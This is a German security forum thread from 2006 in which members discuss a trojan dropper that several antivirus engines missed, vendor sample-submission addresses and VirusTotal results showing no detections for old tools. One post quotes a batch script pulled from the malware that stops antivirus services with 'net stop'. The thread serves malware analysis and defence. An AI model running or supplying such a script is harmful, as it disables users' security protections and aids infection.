Rokop Security

Willkommen, Gast ( Anmelden | Registrierung )

6 Seiten V   1 2 3 > »   
Reply to this topicStart new topic
> Trojan-Dropper.Win32.MultiJoiner.13.j, nicht Wert eingepflegt zu werden?
Stefan
Beitrag 25.04.2006, 02:36
Beitrag #1



Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.011
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 11 Pro
Virenscanner:
F-Secure Total
Firewall:
Router, Windows-Firewall



Vor gut 3 Wochen habe ich mal eine vermeintliche Bilddatei auf Jottis und Virustotal scannen lassen und anschließend an BitDefender gesandt.
Bis heute hat sich dort und auch bei einigen anderen anscheinend nichts getan.

Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?

user posted image

user posted image
Kaspersky hat den Trojan-Dropper übrigens schon am 10.März entdeckt.


--------------------
Gruß
Stefan
Go to the top of the page
 
+Quote Post
JFK
Beitrag 25.04.2006, 04:16
Beitrag #2



Virenreporter
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.077
Mitglied seit: 15.04.2003
Mitglieds-Nr.: 6

Betriebssystem:
Win XP
Virenscanner:
KAV



QUOTE(Stefan @ 25.04.2006, 03:35)
Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?
[right][snapback]145089[/snapback][/right]

Natürlich ist es wert einen Schädling einzupflegen, sonst macht das AV Programm ja kaum einen Sinn wink.gif
Die Geschäftsphilosophie einzelner Unternehmen ist eben unterschiedlich gestaltet, wegen dem "Wieso?" würde ich mal bei Bitdefender nachfragen.

JFK


--------------------
Statt zu klagen, dass wir nicht alles haben was wir wollen, sollten wir lieber dankbar sein, dass wir nicht alles bekommen, was wir verdienen
Go to the top of the page
 
+Quote Post
Domino
Beitrag 25.04.2006, 11:00
Beitrag #3



Schauspiel-Gott
aka Kilauea
Gruppensymbol

Gruppe: Mitarbeiter
Beiträge: 7.485
Mitglied seit: 20.04.2003
Wohnort: Göttingen
Mitglieds-Nr.: 46



Andererseits ist bei den meisten gerade polipos die Priorität.




Domino




--------------------
Keep the spirit alive.....
Go to the top of the page
 
+Quote Post
Gast_skep_*
Beitrag 25.04.2006, 11:23
Beitrag #4






Gäste






Ich hab hier auch so ein Kandidaten der nur von einigen erkannt wird. Laut Virustotal wird der Backdoor u.a. nicht von Avast, AVG, Bitdefender, DrWeb, NOD32v2, Panda, Sophos erkannt..und dies seit Wochen schon. Hab ihn zwar nirgends eingeschickt, aber da ich mehrmals in meinen Apache-Logs Hinweise auf diesen fand, kann das Teil ja nicht soo unbekannt sein.
Handeln tut es sich um:
BDS/Katien.R bzw. Backdoor.Tsunami.w, Backdoor.Kaitex ect. ..scheint ein Backdoor zu sein, den es schon seit 2001 gibt..

Der Beitrag wurde von skep bearbeitet: 25.04.2006, 11:24
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 25.04.2006, 12:35
Beitrag #5



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



hab mir die Malware von Stefan mal schicken lassen .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden einige sachen daraus gestartet ,darunter eine schmuddlige bilddatei und 2 rar-sfx dateien.
eine rar-sfx datei wird sofort erkannt als :
QUOTE
Quelle: danz6.exe
Klicken Sie hier, um weitere Informationen über dieses Risiko zu erhalten: Backdoor.Trojan
Durchgeführte Aktion: Gelöscht

bei der zweiten kommt eine rar-installer GUI die ich aber abgebrochen hatte. wenn ich jedoch da reinschaue kommt eine stille informationsanleitung zum vorschein, das heisst das rar-sfx hätte sich im silentmodus starten sollen. wink.gif
darunter auch eine batch-datei die weitere malware installieren soll und ......
QUOTE
@echo off
start /min cmd /c net stop "Antivir Service" 2>nul
start /min cmd /c net stop antivirService 2>nul
#################
start /min cmd /c net stop "Antivir Scheduler" 2>nul
######dfgsdafaag
start /min cmd /c net stop navapsvc 2>nul
####start    /min cmd /c net stop jkfdlkjfdlkjfdslkg 2>nul
start /min cmd /c net stop "AntiVir PersonalEdition Classic Service" 2>nul
exit

Antivir killen sollte biggrin.gif

p.s. die *.com selbst hab ich an symantec eingeschickt .

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 12:51


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
drweb-online
Beitrag 25.04.2006, 13:35
Beitrag #6



War schon mal da
*

Gruppe: Mitglieder
Beiträge: 44
Mitglied seit: 23.04.2006
Wohnort: Berlin
Mitglieds-Nr.: 4.833

Betriebssystem:
WinXP, Win2k Server
Virenscanner:
Dr.Web



Bitte die Datei an vms(at)drweb.com senden mit dem Subject "New Virus".

Danke
Michael
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 25.04.2006, 13:40
Beitrag #7



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



ist abgeschickt , das passwort zum öffnen liegt bei.


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
Lucky
Beitrag 25.04.2006, 13:58
Beitrag #8



Gehört zum Inventar
Gruppensymbol

Gruppe: Freunde
Beiträge: 3.252
Mitglied seit: 21.04.2003
Mitglieds-Nr.: 51



QUOTE(bond7 @ 25.04.2006, 13:34)
hab mir die Malware von Stefan mal schicken lassen  .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden
[right][snapback]145156[/snapback][/right]

Doch hoffentlich nicht auf deinem Produktivsystem? Denn auch mit nur Gastrechten, kan man sich was einfangen...

Lucky stirnklatsch.gif
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 25.04.2006, 14:33
Beitrag #9



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



QUOTE
auch mit nur Gastrechten, kan man sich was einfangen...

Möglichwerweise , aber die Wahrscheinlichkeit dazu ist eher gering weil die Zugriffs- und Schreibberechtigung zu niedrig ist.
Ich hab aber trotzdem alles kontrolliert , möchtest du mein Log nochmal gegenprüfen? laugh.gif biggrin.gif

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 14:34


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
Stefan
Beitrag 25.04.2006, 17:56
Beitrag #10


Threadersteller

Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.011
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 11 Pro
Virenscanner:
F-Secure Total
Firewall:
Router, Windows-Firewall



Na wie ich sehe scheint ja wenigstens einer der acht, die den Dropper nicht erkennen, Interesse zu zeigen.


--------------------
Gruß
Stefan
Go to the top of the page
 
+Quote Post
Gast_skep_*
Beitrag 25.04.2006, 18:02
Beitrag #11






Gäste






Den von mir weiter oben erwaehnten Backdoor erkennt DrWeb nun auch (BackDoor.Tsui)
Go to the top of the page
 
+Quote Post
Kyu
Beitrag 25.04.2006, 20:12
Beitrag #12



War schon oft hier
**

Gruppe: Mitglieder
Beiträge: 137
Mitglied seit: 18.02.2006
Mitglieds-Nr.: 4.457

Betriebssystem:
XPSP2



Was bitdefender angeht gibts zwei möglichkeiten. über das programm hochladen und abschicken, dann landet es im labor in rumänien (reaktionzeit war bei mir immer innerhalb von ca 1-2 tagen jedoch ohne feedback) - oder mit beigefügtem pw versehen an support@bitdefender.de - dann dauerts paar std länger, aber man bekommt feedback (ticket usw).

welchen weg hast du denn genommen?


--------------------
"Cassius was right: 'Men at some times are masters of their fates; The fault, dear Brutus, is not in our stars, but in ourselves….'"
Go to the top of the page
 
+Quote Post
Stefan
Beitrag 25.04.2006, 20:27
Beitrag #13


Threadersteller

Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.011
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 11 Pro
Virenscanner:
F-Secure Total
Firewall:
Router, Windows-Firewall



QUOTE(Kyu @ 25.04.2006, 21:11)
welchen weg hast du denn genommen?
[right][snapback]145239[/snapback][/right]
Ich hatte das Archiv mit PW versehen an virus_submission(at)bitdefender.com geschickt.


--------------------
Gruß
Stefan
Go to the top of the page
 
+Quote Post
Kyu
Beitrag 25.04.2006, 20:42
Beitrag #14



War schon oft hier
**

Gruppe: Mitglieder
Beiträge: 137
Mitglied seit: 18.02.2006
Mitglieds-Nr.: 4.457

Betriebssystem:
XPSP2



QUOTE
die eingesandten verdachtsfälle über das programm landen übrigens direkt bei den technikern in rumänien. die nehmen die dinger nur ausseinander und bauen sie gleich in neuen signaturen ein, daher bekommt man darauf auch kein feedback. wer wert auf feedback legt soll sein zeug gepackt an support@bitdefender.de schicken.


hab gerade nochmal nachgeguckt welche adresse beim letzten gespräch angegeben wurde. keine ahnung wie das mit virus_submission ist.
falls du nochmal sowas hast kannst dus vielleicht über support@ versuchen =)


--------------------
"Cassius was right: 'Men at some times are masters of their fates; The fault, dear Brutus, is not in our stars, but in ourselves….'"
Go to the top of the page
 
+Quote Post
Stefan
Beitrag 25.04.2006, 21:00
Beitrag #15


Threadersteller

Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.011
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 11 Pro
Virenscanner:
F-Secure Total
Firewall:
Router, Windows-Firewall



Wenn ich an die letzten Einsendungen an "support(at)bitdefender.de" denke, belief sich das Feedback darauf, dass es eine Bestätigung des Verdachts auf Malware gab und man ein zügiges Bereitstellen einer Signatur versprach. Ne knappe Woche hat es dann trotzdem noch gedauert.

Ach ja, in der Mail gab es übrigens auch noch den Hinweis, dass wenn man Dateien direkt an "virus_submission(at)bitdefender.com" senden würde, man dort schneller reagieren könnte. lmfao.gif

Der Beitrag wurde von Stefan bearbeitet: 25.04.2006, 21:00


--------------------
Gruß
Stefan
Go to the top of the page
 
+Quote Post
Gast_blueX_*
Beitrag 25.04.2006, 21:27
Beitrag #16






Gäste






@stefan
@skep
@bond

http://www.rokop-security.de/index.php?showtopic=8685

Ich habe mir einmal die genannten Adressen als Fließtext angelegt, so dass ich nur den Fließtext einkopiert habe.
Solltet ihr Interesse habe, dann schick ich euch den Fließtext und keine Arbeit habt.

Go to the top of the page
 
+Quote Post
Kyu
Beitrag 25.04.2006, 21:35
Beitrag #17



War schon oft hier
**

Gruppe: Mitglieder
Beiträge: 137
Mitglied seit: 18.02.2006
Mitglieds-Nr.: 4.457

Betriebssystem:
XPSP2



na dann mal sehen wie lang es noch dauert =)


--------------------
"Cassius was right: 'Men at some times are masters of their fates; The fault, dear Brutus, is not in our stars, but in ourselves….'"
Go to the top of the page
 
+Quote Post
Stefan
Beitrag 26.04.2006, 22:33
Beitrag #18


Threadersteller

Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.011
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 11 Pro
Virenscanner:
F-Secure Total
Firewall:
Router, Windows-Firewall



Übrigens bei Dr.Web hat man sich Mühe gegeben.
Der Dropper wird jetzt als "Trojan.MulDrop.3684" erkannt.


--------------------
Gruß
Stefan
Go to the top of the page
 
+Quote Post
Gast_rock_*
Beitrag 27.04.2006, 09:16
Beitrag #19






Gäste






ich frag mich schon seit langem wie diese uploadscanner arbeiten...

hab aus meinen set mal den stubby (ein ganz altes klumpert) hochgeladen...

und KEINER erkennts plötzlich!

STATUS: FINISHEDComplete scanning result of "stubby_d.exe", received in VirusTotal at 04.27.2006, 10:12:20 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found

mein mc afee springt aber natürlich sofort an, wenn ich ihn entpacken will!

ph34r.gif
Go to the top of the page
 
+Quote Post
Gast_rock_*
Beitrag 27.04.2006, 09:33
Beitrag #20






Gäste






hier detto! mc afee knallt sofort an! zwar nur ein passwort tool, jedoch...NICHTS GEFUNDEN!

STATUS: FINISHEDComplete scanning result of "RiskWare.PSWTool.Snitch.11.exe", received in VirusTotal at 04.27.2006, 10:29:06 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found
_____________________________

dieses tool wurde seinezeit von kaspersky als solches wie es im text steht erkannt!

rock ph34r.gif

edit: bild von aktueller mc afee erkennung:


Der Beitrag wurde von rock bearbeitet: 27.04.2006, 09:36
Go to the top of the page
 
+Quote Post

6 Seiten V   1 2 3 > » 
Reply to this topicStart new topic
1 Besucher lesen dieses Thema (Gäste: 1 | Anonyme Besucher: 0)
0 Mitglieder:

 



Vereinfachte Darstellung Aktuelles Datum: 29.03.2024, 16:22
Impressum